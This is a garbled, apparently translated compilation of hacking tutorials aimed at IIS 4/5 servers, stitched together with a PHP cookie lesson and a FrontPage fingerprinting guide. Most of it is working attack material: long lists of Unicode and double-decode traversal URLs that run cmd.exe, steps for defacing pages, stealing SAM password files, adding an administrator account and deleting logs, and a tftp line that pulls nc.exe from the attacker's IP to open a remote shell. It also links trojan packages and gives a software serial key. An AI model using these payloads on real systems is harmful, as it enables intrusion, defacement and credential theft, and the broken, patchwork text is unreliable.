. NT4 / Win2k
IIS4.0 / IIS5.0
.
anonymous
person
.
.
-:
-1
.
.
-2
.
IIS4 / IIS5 CMD
.
. CMD
CMD
-:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx
:
http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.ex
e
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.e
\xe+c:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb
: http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt
:
:
http://www.xxxx.com/msadc/hEx.mdb
.
-:
http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
-:
msadc , _vti_bin , iisadmpwd , _vti_adm , scripts , samples , cgi-bin
. ECHO
-:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
-:
w3svc.exe
inetpub\scripts
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe
w3svc.exe
-:
inetpub\scripts
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\
inetpub\wwwroot\index.htm -:
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm
.
CMD
-:
CMD
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
CMD -:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?/c+dir+c:\
Access Denied . Access Denied
Access Denied
-:
CMD CMD1
-1
Copy -:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
ssinc.dll -:
-2
test.shtml
o
wwwroot/hEx/test.shtml
o
<!--#include file="AAAA[...]AA"-->
o
A 2049 .
http://www.xxxx.com/test.shtml
o
.
o
. Access Denied
o
500
o
.
NC.exe
-3
Temp Temp
.
-4
.
root.exe sensepost.exe shell.exe w3svc.exe :
-5
c:\inetpub\scripts .
-1
. FTP
CMD Scripts Shell.exe
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe
(ftp script file, one command per line:)
hEx@Hotmail.Com
get index.html
quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
.
) ( Microsoft Access L0phtCrack
-:
\winnt\repair\sam._  (load it into L0phtCrack)
-:
PASSFILT.DLL -:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL
ASP
+.htr (MySQL)
-:
http://www.xxxx.com/default.asp+.htr
database.inc
.
. TFTP
1- put index.htm in c:\ on your own machine
2- run a TFTP server there, then:
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
   tftp.exe  : the TFTP client on the target
   "-i"      : binary (image) transfer
   1.1.1.1   : your TFTP server
   GET       : download
   index.htm : the file on your server
   C:\inetpub\wwwroot\index.htm : where it is written on the target
Delete the logs in System32:
/c+del+c:\winnt\system32\logfiles\*.log
" ) ( "
> <
..
..
:
------------- )( cmd cmd1
:
/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmd1.exe
.. Echo
) CMD1.exe ( !
..
IWAM_USER Guest
. IIS
Guest !! (:
(: * nix Microsot
(: Administrator (:
..
(: ..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:
:
Sechole - 1 .. ) (
..
. (:
Tlist - 2 .. +
(:
Kill.exe -3 .
NCX99 -3 NC 99
TFTP32.exe -4 ..
(: :
..
ncx99.exe :
http://target/scripts/..../winnt/system32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD = . Guest
.. TLIST .. PID
.. ..
PID ..
Kill .. KILL.exe PID : PID (:
! ..
Sechole .. ..
(: Sechole.exe .
IWAM_USER .. Administrators
. Access Denided
:
/c+Echo+Hacked+by+XDeMoNX+>+C:\inetpub\wwwroot\index.htm
..
... (:
: IWAM_USER
: .. ! .
(: .. .
Administrator .
!! (: (:
:
net user Demon pass /add && net localgroup administrators Demon /add
Save as . add.bat
: Demon Pass
(: ..
add.bat ) (
(: .. (:
(:
) !(
.
..
netstat -an ..
(:
90% (: 139
(:
(:
.. (: .
.. . GUI
..
GEtAdmin Sechole2 .. WINvnc
" "
<>
< :>
:
( 1
TFTPD ( 2
( 3
=================================================
=================================================
1)
http://www.devil2k.com/
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
2) TFTPD
http://iisbughelp.4t.com/
3)
(which drives exist:)
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\   (drive C:\)
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+D:\   (drive D:\)
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+E:\   (drive E:\)
1) msadc:
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
2) _vti_bin:
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
The IIS web root is normally one of:
C:\Inetpub\wwwroot
D:\Inetpub\wwwroot
E:\Inetpub\wwwroot
For C:
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
then:
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
)
( wwwroot
wwwroot
index.htm
)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
wwwroot index.htm
index.htm ss.htm
c+dir and c+ren (DOS command prompt commands):
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.htm+ss.htm
(index.htm is renamed to ss.htm)
(:
A
!!!Hacked
index.htm
TFTP
TFTP )
(
\ C:
index.htm \C:
\ C:
C:\inetpub\wwwroot
)) (( TFTP
TFTP )) ((
:
tftp.exe -i XXX.XXX.XXX.XXX get index.htm C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX ((
index.htm
wwwroot
:
tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
(:
TFTP index.htm
:
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
)) (( (:
: EXE :
EXE hunter.exe
:
index.htm \ C:
:
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
*.log
:
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s
(tmp files:)
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s
)) ((
bat
)) (( system32
______________________________________________________________
__________________
:
tftp
)) (( system32
)) ((
###########
# Game Starts !#
###########
---------------
- : IIS Hack.exe
--------------- eEye nc.exe
.. 80
cmde.exe . Administrator
NC.exe IIS Hack.exe . /http://www.technotronic.com
..
nc.exe ) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe www.target.com 80 your_IP/ncx.exe
then connect to the shell ncx.exe binds on port 80:
c:\>nc -v www.target.com 80
: IIS4.0 )) (( .
do you want me to explain what to do next, hey common you must be
kidding
....hehe...
-----------------: MDAC = RDS
---------------- ) %40 ..
..
SYSTEM ..
..
c:\>nc -n -w 2 www.host.com 80
GET /msadc/msadcs.dll HTTP
(a reply mentioning application/x-varg means msadcs.dll, and with it RDS, is present)
www.wiretrip.net/rfp  (mdac.pl / msadc2.pl)
c:\>mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c echo hacked by me hehe > C:\inetpub\wwwroot\index.htm
Hacker's Swiss Army knife (nc.exe):
%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&&attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
)) ((
80 . Administrator
--------------------------------------: Codebrws.asp & Showcode.asp
------------------------------------- ASP IIS
..
)) asp.
(( .
)) (( :
http://www.victim.com/msadc/samples...nt/repair/sam._
.. Expand it & Crack it ) LC3.0
24 ( .
-------------- : Null.htw
----------- .. ..
.. ASP
http://www.victim.com/null.htw?CiWe...HiliteType=full :
. Default.asp
---------------------- : webhits.dll & .htw
--------------------- http://www.victim.com/blabla.htw :
format of the QUERY_STRING is invalid :
. %90
:
www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
XXXXX/XXXXX/XXXX/XXX.htw , :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
.. LC3
-----------------------------------------------: ASP Alternate Data Streams [::$DATA]
----------------------------------------------- .. 1998 IIS3.0
.. IIS4.0
)) ((
Global.asa
http://www.victim.com/default.asp::$DATA
------------------ : ASP dot bug
----------------- ..
.. 1997
:
http://www.victim.com/sample.asp.
. IIS3.0
------------------------------------ : ISM.DLL Buffer Truncation
----------------------------------- ..
..
..
ISM.dll )( 20%
. Space
:
http://www.victim.com/global.asa%20(...<=230)global.asa.htr
<=230 230 .. %20
.. IIS 4.0&5.0
,
ISM.dll ..
..
Rebot . Logout & Login
----------: +.htr
-------- . ASP
:
http://www.victim.com/global.asa+.htr
------------- : site.csc
----------- DNS DSN, UID and
.. PASS Database
http://www.victim.com/adsamples/config/site.csc :
.. .
" "UniCode
> <
><Dark Devil :
::
.
) .... (
)( Trust Me
::
:
====
Found On 15 May 2001 BY NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
:: )
( IUSR_machinename account
cgi
) DeCode (
::
http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c:\   <===
http://iisserver/   <====
* - /scripts/ )
( cgi
( executable directory
iis
:: iis executable directory
)
(
* <=== winnt/system32/cmd.exe cmd
) cmd ping
netstat .... traceroute (
* -
) (
argument
copy
argument /c c/
arguments c/
.
, cmd.exe
::
Ping.exe+PRINT cmd.exe?/c
). ( enjoy this ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
* - +c/ c/ argument cmd.exe
cmd + c/
+
.
** )
( decode
simplyfiey
::
..%255c..%255c../ is the doubly encoded form of ..\..\ :
IIS checks the path for ".." followed by a separator before it decodes the request a second time, so the check sees "%255c" and lets it through; the second decode turns it into "\" (the "decode" bug).
The values are plain hexadecimal: %20 is a space and %5c is the backslash \, which IIS accepts as a path separator just like /.
The bytes that spell out "%5c" itself:
%25 = %
%35 = 5
%63 = c
So each of the following becomes %5c on the first decode and \ on the second:
%255c     : %25 = %  , 5       , c       -> %5c -> \
%%35c     : %        , %35 = 5 , c       -> %5c -> \
%%35%63   : %        , %35 = 5 , %63 = c -> %5c -> \
%25%35%63 : %25 = %  , %35 = 5 , %63 = c -> %5c -> \
The directory check never sees a real separator; the file system does.
Example (the /s switch lists subdirectories recursively):
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
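The decoding rules above, and the long lists of %255c / %c0%af / %c1%1c paths in the earlier sections, can be checked mechanically. The following Python is an added example, not code from the original page: it models the vulnerable IIS decoder (two percent-decodes, then a UTF-8 decoder that accepts overlong sequences) and then asks whether the decoded path climbs above the virtual directory, which is the check that should have been made after decoding. The sample requests are constructed for the demo; the model is an approximation of the real decoder, not a copy of it.

```python
"""Model of the IIS 4/5 path decoder behind the "decode" and "Unicode" bugs.

Added example (not from the original page). It reproduces:
  * double decoding: "%255c" -> "%5c" -> "\\"
  * overlong UTF-8:  "%c0%af" -> "/", "%c1%9c" and "%c1%1c" -> "\\"
and then checks whether the decoded path escapes the virtual directory.
"""
import re
from urllib.parse import unquote_to_bytes

# (mask, value, sequence length) for UTF-8 lead bytes, including the 5- and
# 6-byte forms that were never valid but that a lenient decoder accepted.
_LEAD = ((0xE0, 0xC0, 2), (0xF0, 0xE0, 3), (0xF8, 0xF0, 4), (0xFC, 0xF8, 5), (0xFE, 0xFC, 6))


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 without rejecting overlong forms or checking that the
    trailing bytes look like continuation bytes (that is how %c1%1c worked)."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        n = next((n for mask, val, n in _LEAD if b & mask == val), 0)
        seq = raw[i:i + n]
        if n == 0 or len(seq) < n:
            out.append(chr(b))              # ASCII, stray or truncated byte: pass through
            i += 1
            continue
        cp = b & ((1 << (7 - n)) - 1)       # payload bits of the lead byte
        for c in seq[1:]:
            cp = (cp << 6) | (c & 0x3F)     # no 10xxxxxx check, on purpose
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += n
    return "".join(out)


def iis_decode(path: str) -> str:
    """Percent-decode twice (once for the check, once before opening the
    file), then run the lenient UTF-8 decoder over the result."""
    raw = path.encode("latin-1", "replace")
    raw = unquote_to_bytes(unquote_to_bytes(raw))
    return lenient_utf8(raw)


_SEP = re.compile(r"[\\/]+")


def escapes_root(decoded_path: str) -> bool:
    """True when '..' segments climb above the virtual-directory root."""
    depth = 0
    for seg in _SEP.split(decoded_path.strip("\\/")):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def triage(request_url: str) -> dict:
    """Decode the path part of a request and report what it resolves to."""
    path = request_url.split("?", 1)[0]
    decoded = iis_decode(path)
    return {
        "decoded": decoded,
        "traversal": escapes_root(decoded),
        "cmd_exe": decoded.lower().replace("\\", "/").endswith("/cmd.exe"),
    }


def scan(requests):
    """Requests from a log that resolve outside their virtual directory."""
    return [r for r in requests if triage(r)["traversal"]]


# Constructed sample (three entries in the style of the lists above, one benign hit).
SAMPLE = [
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
    "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/scripts/counter.exe?page=1",
]

if __name__ == "__main__":
    for r in SAMPLE:
        print(triage(r), r)
```

Entries in the lists that are not valid hex at all (%c0%9v, %c1%pc and the like) simply fall through the decoder unchanged, which is also why they never worked against a real server.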
) MCSE
( 2000
.WIN2000 RESOURCE KIT
" "
> : <
..
.....
******************
...
.....
2000 .
IIS :
*1 .
*2 .
*3 " ".
*4 .IIS
..
:
Inetpub\wwwroot
IIS
http://127.0.0.1/
.
" "
> <
>:
<De\/iL Ni9hT
= =-,,,
)),,,,((
=-
=-
.. =-
=-
=-
= =
)) ((
-1
)) ((
-2
/http://www.name.8m.com
FreeServerS
))....8m.s5
)) (( ))
((
))
((
=-
IE 5 IE 5.5
)) "
"((
,,,,
keykey2000
http://www.mikkotech.com/kk2000pro.exe
SN: K100-43-109-0-793218E876A4C9-29
godwill 5 ))5.5
((
http://www.thecorpz.org/activex/gwpackage.zip
=========================================
enter
Upx )) ((
Html
General options
enter exe file ))
((
enter html use default
page
HTA File Name Done
)) ((
http://www.thecorpz.org/html/activesploits.html
=================== ====================
)) ,,((
.
" "
> <
>:
<Linux Girl
) ( cookies
..
...
:
-1 .
-2 .
-3 .
-4 : .
.
.
IP .
Log Files .
.
.
" "
.
.
.
: ...
: :
setcookie :
:code
bool setcookie ( string name [, string value [, int expire [, string path [, string domain [, int secure ]]]]] )
:
: name ...
.
: value ... ... ...
... : serialize
unserialize .
: expire ... the expiry time as a Unix timestamp (seconds since 1 January 1970)
... :
<- : .
<- : .
<- : . :
:code
<?php
setcookie('site', 'http://www.palhackerz.com/', time() + 3600);
?>
time() returns the current Unix timestamp (seconds since 1 January 1970), so time() + 3600 is one hour from now.
:
:
:code
<?php
setcookie('site', '', time() - 360000);
?>
:
-1 .
-2 .
:
setcookie .. :
:code
<?php
// setcookie() sends a header, so it must run before any HTML is output
setcookie('site', 'palhackerz.com', time() + 20000);
?>
<html>
<body>
<?php echo "Alfjr.com : the best islamic forum"; ?>
</body>
</html>

<html>
<body>
<?php echo "palhackerz.com : the best Hacking forum"; ?>
</body>
</html>
: ..
PHP ...
$_COOKIE (an associative array)
.
:
:code
<?php
echo $_COOKIE['site'];
?>
:
:code
palhackerz.com
:
..
1- user.php : holds the functions
2- index.php : includes user.php
:
1- user.php
:code
<?php
/*-----------------------*/
function display_form() {
?>
<html>
<body>
<!-- Color setting form -->
<form name="color_select" method="GET">
<input type="hidden" name="do" value="set_color">
<input name="color" type="text" value="<?php echo htmlspecialchars(get_color()); ?>">
<input type="submit" value="">
</form>
<!-- Color clearing form -->
<form name="color_clear" method="GET">
<input type="hidden" name="do" value="clear_color">
<input type="submit" value="">
</form>
</body>
</html>
<?php
}

function set_color() {
    // the value comes straight from the user; it is escaped wherever it is printed
    setcookie('color', $_GET['color'], time() + 36000);
    header('Location: index.php');
}

function get_color() {
    if (isset($_COOKIE['color'])) {
        return $_COOKIE['color'];
    } else {
        return "#FFFFFF";
    }
}

function clear_color() {
    // an expiry time in the past deletes the cookie
    setcookie('color', '', time() - 36000);
    header('Location: index.php');
}

// selection: read $do from the query string (register_globals is off)
$do = isset($_GET['do']) ? $_GET['do'] : '';
if ($do == 'display_form') {
    display_form();
} elseif ($do == "set_color") {
    set_color();
} elseif ($do == "clear_color") {
    clear_color();
}
?>
display_form, set_color, get_color, clear_color.
2- index.php (calls get_color() from user.php):
:code
<?php include('user.php'); ?>
<html>
<body bgcolor="<?php echo htmlspecialchars(get_color()); ?>">
<h1>.....</h1>
<br>
<br>
http://www.geocities.com/love2002_il/godwill16.zip
tlsecurity :
:
html Godwill
...
html ...
Done
...
Gen
...enter Output 3
...
/http://www.tripod.lycos.co.uk ...
...
) ( zone Alarm ...
...
.
" "NOOP4
> <
>< .MoHfOx. :
god will .
.. godwill
noob 4.0
=======================================
=============================
-1
=================
======================
=============================
layout 2<<<<====:::
6
-2 Internet Explorer 5
-3 Internet Explorer5.5
4 5
-6
==================================================
===================
executable file 3 <<<<====:::
-7
-8
=======================================
=============================
-9 <<<<====:::
...
" "
><
><. ( T.O.L. ( DeXXa :
:
* .
* FrontPage Server Extensions .
* . Microsoft Office FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
* Server Side Scripting
. Language
. Screen Capture
@ :
.
.
. FrontPage Server Extensions
. FrontPage Extension Server
. FrontPage Extension Server
. FrontPage
.
@
* . FrontPage Server Extensions
* .
* .
* .
@ :
PHP
CGI Perl SSL FTP . SQL
Webmasters Microsoft
Office FrontPage
Office
.
@ FrontPage Server Extensions
) : (
Server
.
:
/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt
/_vti_txt
:
* _vti_bin:
  contains (under /_vti_bin/):
  /_vti_adm/
  /_vti_aut/
  and the executables:
  shtml.exe
  fpcount.exe
* _vti_pvt:
  contains:
  service.pwd : user names and DES-encrypted passwords
  service.grp : groups (authors)
  deptodoc.btr, doctodep.btr
  .htaccess
)
( .
) : (
* _private:
  .htaccess
@ FrontPage Extension Server
FrontPage Extension Server . HTTP
FrontPage Request
FrontPage Extension Server
fpcount.exe
Extension Server
.
@ : FrontPage Extension Server
FrontPage
FTP
.
: FrontPage Extension Server
) : XP
(
* FrontPage . Office
* File . Open Web
* ) ( .
*
.
*
.
@ FrontPage :
:
* :
* _vti_inf.html :
FrontPage creates _vti_inf.html in the web root:
http://www.Victim.com/_vti_inf.html
It is titled "FrontPage Configuration Information" and describes the FrontPage Extension Server.
In its source, FPVersion="Version" gives the version.
* _vti_cnf :
http://www.Victim.com/_vti_cnf
In the source look for vti_generator:Programe, where Programe is "Microsoft FrontPage X" and X is the version.
* the page source:
FrontPage writes into <Head></Head>: <Meta Name="GENERATOR" Content="Programe">
where Programe is "Microsoft FrontPage X.0" and X is the version.
* NetCraft:
At NetCraft.net enter http:// and the site name; with FrontPage the server string contains
mod_frontpage/X
where X is the version of the FrontPage Extensions Server.
* : Telnet
) :
(
Start > Run > telnet, then open the host on port 80:
Microsoft Telnet> open www.Victim.com 80
Send a HEAD request (HTTP request method HEAD). If www.Victim.net is hosted at ISP.net, Host: still names the site you are asking about, because the server picks the virtual host from it:
HEAD / HTTP/1.1
Host: www.Victim.net
Accept: */*
Connection: close
The Server: header in the response names the web server; with FrontPage it contains
mod_frontpage/X
where X is the version of the FrontPage Extensions Server.
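The Telnet exchange above, together with the _vti_inf.html and NetCraft checks, as an added example in Python (not code from the original page). head_request() builds the same request typed into Telnet, send_head() performs it over a socket for live use, and the parsers run offline on constructed responses; the server strings and version numbers in the samples are made up for the demo.

```python
"""Fingerprint FrontPage Server Extensions from a HEAD response and _vti_inf.html.

Added example (not from the original page).
"""
import re
import socket

FP_VERSION = re.compile(r"(?:mod_frontpage|FrontPage)/(\d+(?:\.\d+)*)", re.I)
VTI_INF_VERSION = re.compile(r'FPVersion="([^"]+)"')


def head_request(host: str, path: str = "/") -> bytes:
    """HTTP/1.1 HEAD request; Host: must name the virtual host, not the ISP."""
    return (f"HEAD {path} HTTP/1.1\r\nHost: {host}\r\nAccept: */*\r\n"
            f"Connection: close\r\n\r\n").encode("ascii")


def parse_response(raw: bytes) -> tuple[str, dict]:
    """Split status line and headers; header names are case-insensitive."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def fingerprint(raw_response: bytes) -> dict:
    """What the Server: header alone tells you."""
    status, headers = parse_response(raw_response)
    server = headers.get("server", "")
    m = FP_VERSION.search(server)
    return {
        "status": status,
        "server": server,
        "iis": server.lower().startswith("microsoft-iis"),
        "frontpage": m.group(1) if m else None,
    }


def vti_inf_version(html: str):
    """Version advertised by /_vti_inf.html (FPVersion="...")."""
    m = VTI_INF_VERSION.search(html)
    return m.group(1) if m else None


def send_head(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Live version of the Telnet exchange (needs network; not used by the tests)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(head_request(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                return b"".join(chunks)
            chunks.append(data)


# Constructed sample responses (not captured from any real host).
SAMPLE_APACHE = (b"HTTP/1.1 200 OK\r\n"
                 b"Server: Apache/1.3.20 (Unix) mod_perl/1.26 FrontPage/5.0.2.2510 mod_ssl/2.8.4\r\n"
                 b"Connection: close\r\n\r\n")
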